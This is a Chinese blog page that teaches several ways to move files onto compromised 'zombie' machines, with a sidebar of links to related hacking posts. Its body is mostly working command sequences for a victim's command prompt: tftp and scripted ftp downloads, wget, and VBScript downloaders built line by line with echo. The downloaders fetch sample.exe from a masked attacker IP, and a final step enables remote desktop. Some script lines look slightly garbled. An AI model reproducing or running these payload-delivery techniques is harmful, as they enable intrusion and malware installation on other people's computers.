几种肉鸡上传文件的方法

最新推荐文章于 2020-06-08 16:30:10 发布
最新推荐文章于 2020-06-08 16:30:10 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 黑客 文章标签: 肉鸡 上传文件

  【IT168 黑客攻防】tftp法
  先在自己某机器上建个tftp服务器,如执行tftpd32.exe,
  再将文件(sample.exe)上传到别的机器中(肉鸡),
  肉鸡cmd中执行: tftp -i 服务器ip get sample.exe

   ftp法
  肉鸡cmd中执行:
  echo open ftp服务器ip [端口]>ftp.txt
  echo username>>ftp.txt
  echo password>>ftp.txt
  echo get sample.exe>>ftp.txt
  echo bye>>ftp.txt
  ftp -s:ftp.txt
  del ftp.txt

  工具法
  利用wineggdrop的wget.exe
  肉鸡cmd中执行:wget 网站/sample.exe

  利用dl.vbe法
  肉鸡cmd中执行:
  echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
  echo set aso=.createobject("adodb.stream"):set web=createobject    ("microsoft.xmlhttp") >>dl.vbe
  echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
  echo aso.type=1:aso.open:aso.writeweb.responsebody:aso.saveto file .arguments(1),2:end with >dl.vbe

  cscript dl.vbe http://*。*。*。*:88/sample.exe sample.exe

  利用iget.vbe法
  方法同4,
  肉鸡cmd中执行:
  echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
  echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
  echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe
  echo xPost.Open "GET",iRemote,0 >>iget.vbe
  echo xPost.Send() >>iget.vbe
  echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe
  echo sGet.Mode = 3 >>iget.vbe
  echo sGet.Type = 1 >>iget.vbe
  echo sGet.Open() >>iget.vbe
  echo sGet.Write(xPost.responseBody) >>iget.vbe
  echo sGet.SaveToFile iLocal,2 >>iget.vbe

  cscript iget.vbe http://*。*。*。*/sample.exe sample.exe

  利用Http网站vbe法
  echo Set xPost = CreateObject("Microsoft.XMLHTTP") >dsa.vbe
  echo xPost.Open "GET","http://*.*.*.*/sample.exe",0 >>dsa.vbe
  echo xPost.Send() >>dsa.vbe
  echo Set sGet = CreateObject("ADODB.Stream") >>dsa.vbe
  echo sGet.Mode = 3 >>dsa.vbe
  echo sGet.Type = 1 >>dsa.vbe
  echo sGet.Open() >>dsa.vbe
  echo sGet.Write(xPost.responseBody) >>dsa.vbe
  echo sGet.SaveToFile "sample.exe",2 >>dsa.vbe cscript dsa.vbe
del dsa.vbe

  3389法
  可以开3389,然后登陆,进行本地的下载。该方法对服务器上传很严格的机器特有效。(包括硬件防火墙)

zhu2695
关注
专栏目录
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
OpenStack Octavia(Rocky)的实现与分析
烟云的计算
11-26 8619
目录 文章目录目录
上传文件肉鸡的路不止一条
weixin_34238633的博客
11-12 318
一、 TFTP法传输 我 们最喜欢也是最方便的方式是用TFTP!这里要配合TFTP32这个小型的文件传输服务器,TFTP协议使用的是UDP69端口,在我们得到肉机的 SHELL后可以很方便的传输文件到肉机上的!下面看我详细的讲解和操作,在我们得到的SHELL里输入tftp –I IP get/put xx.exe就OK了,注意这里一定要记得带上参数-...
传到肉鸡的木马名称(随意写)
weixin_33696106的博客
03-03 295
2019独角兽企业重金招聘Python工程师标准>>> ...
肉鸡上安装ftp服务器
q1q2q3q4ln的专栏-随我一起研究程序
11-21 696
提升unicode权限,安装代理跳板-(2013/11/20) 通过cgiproxy建立基于web的安全匿名代理服务器-(2013/11/20) 在肉鸡上安装ftp服务器-(2013/11/20) 利用sa空密码制作跳板-(2013/11/20) 使用squid做代理服务器-(2013/11/20) 在局域网里实现二次代理-(2013/11/20) 突破网关-(2013/11/20)
利用Cmd躲过肉鸡防火墙方法
weixin_33875564的博客
09-07 253
在网络过载***中,一个共享的资源或者服务由于需要处理大量的请求,以至于无法满足从其他用户到来的请求。例如一个用户生成了大量的进程,那么其他用户就无法运行自己的进程。如果一个用户使用了大量的磁盘空间,其他用户就无法生成新的文件。有效保护系统免遭过载***的办法是划分计算机中的资源,将每个用户的使用量限制在自己的那一份中。另外,还可以让系统自动检查是否过载或者重新启动系统。  ...
DDOS肉鸡代码
weixin_34021089的博客
04-17 1604
为什么80%的码农都做不了架构师?>>> ...
渗透-------五种远程开启3389端口方法
weixin_34392435的博客
07-30 5266
3389端口是远程登入使用的默认端口,在渗透测试和系统安全配置中起到举足轻重的地位。因此,这里根据资料和个人见解整理了几种远程打开3389端口的方法,仅做参考! 以下共五种方法,其中一、四针对服务,二、三、五使用应用软件,希望对你有帮助。 一、打开记事本,编辑内容如下: echo[Components]>c:\sql echoTSEnable=on>>c:\sql ...
9种经典的webshell提权方法
网络专栏
06-10 1605
第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 也给了我们方便,到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机
js挂马分析及处理方法
白强
09-23 657
js挂马分析及处理方法 在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的种类、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。   1:网页挂马的种类.   目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。   卢松松以前做...
教大家一日抓肉机2000只
12-19
教大家一日抓肉机2000只 很有用的东西 大家可以学习学习啊
查看电脑是否被肉鸡
Yama的博客
06-08 1万+
电脑安全重中之重,被人肉鸡了,如果挖矿用于DDOS啥的可就不好了 (我最怕的是,摄像头被后台启动) .关闭所有联网软件和自动更新 ,查看端口外部地址连接 (有些软件会连接外部连接如FileZilla网远程主机上传文件“它是网站文件上传工具”) win+r 打开运行输入cmd 命令:netstat -ano 看LISTENING对应外部地址是否被连接,如果外部地址不是0.0.0.0:0 或者 [::]:0,那么你的电脑很可能已经是别人的肉鸡了(眼睛尖一点,我一般一周看一次,不是只有上面这么一点,下面也会有
.net remoting+win服务+反射做肉鸡远程控制
laotse的专栏
09-30 4414
好不容易找到个肉鸡,经常出现被管理员删除和肉鸡被别的扫肉鸡者抢。用现成的木马一是害怕本身木马就有病毒别人没控制反倒自己中招了,另外一个木马逃不过杀毒软件,所以决定自己做个后门。大家会有疑问,如果服务器没装.net怎么办,这个不是问题,因为只有服务器肉鸡才有利用价值,winxp的客户机肉鸡没什么用因为不能同时终端登录而且普通用户机器不是常开的ip也是每次都不一样,这样子反正对我就没什么用,我只要服务
轻松实现检测Windows肉鸡系统信息
01-29 1936
wocaca入侵后第一步做什么?当然是查看肉鸡的各种系统信息,然后再决定这个肉鸡该吃还是该丢?是好鸡还是病鸡?那检测肉鸡系统信息的方法是什么呢?全手工?累!用大程序?不方便传输!该怎么办呢?还是发扬我们的diy精神,自己打造一个适合自己使用习惯的系统信息检测工具吧!follow me!1.操作系统详细信息收集我们一般所讲的系统信息包含操作系统版本、service pack、build号等,如何
黑客大学堂:你看的懂的肉鸡制作步骤(转)
cuanjun1153的博客
09-19 822
黑客大学堂:你看的懂的肉鸡制作步骤(转)[@more@]  第一步:扫描弱口令  这里我用20cn开发的scanipc    不一会就会扫到很多有弱口令的主机(就我的经验在教育网上这样的主机比较多)  第二步:连接刚扫的肉鸡  ...
服务器肉鸡解决过程
wanghaichaonihao的专栏
07-27 4197
上个星期五同事说阿里云发短信说吉林一个IP登陆了我们公司的一个服务器,让我上去看看,然后在/var/log/secure日志中两行登录日志 Mar  9 20:35:30 localhost sshd[30379]: Accepted password for root from 221.203.142.131 port 56906 ssh2 Mar  9 20:35:30 localhost
上传方法总结[对入侵很实用]
...::: X.U.S.T :::...
10-18 1493
作者:小虾米  来自:朋友的家现在将本人用于上传的方法进行汇总如下:1. tftp法先在自己某机器上建个tftp服务器,如执行tftpd32.exe,再将文件(sample.exe)上传到别的机器中(肉鸡),肉鸡cmd中执行: tftp -i 服务器ip get sample.exe2. ftp法肉鸡cmd中执行:echo open ftp服务器ip [端口]>ftp.txtecho
点开一个网址我被记录了ip还偷拍了照片
热门推荐
Lzers
01-17 4万+
突发奇想的思路,既然可以记录IP我为什么不可以更方便些,顺手偷拍攻击对象,看看他长啥样! 因为事先已经有了IP记录平台,所以方便省事,直接开始研究偷拍 随手写了偷拍页面前端,伪造的受攻击验证(将就看,毕竟只是做一次演示) Post引用 ...
1433抓肉鸡bat命令收集
weixin_34351321的博客
11-12 264
net user guest 87966550 net localgroup administrators guest /add net user guest /active:yes echo open 219.128.253.142 >1.txt echo 123 >>1.txt echo 123 >>1.txt ech...
kali linux捉肉鸡教程
最新发布
10-27
Kali Linux捉肉鸡教程是一种网络安全攻击技术,旨在通过社会工程学攻击和漏洞利用技术获取远程计算机的控制权。以下是一些步骤: 1. 扫描目标网络,找到易受攻击的计算机。 2. 利用漏洞或社会工程学攻击技术,将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值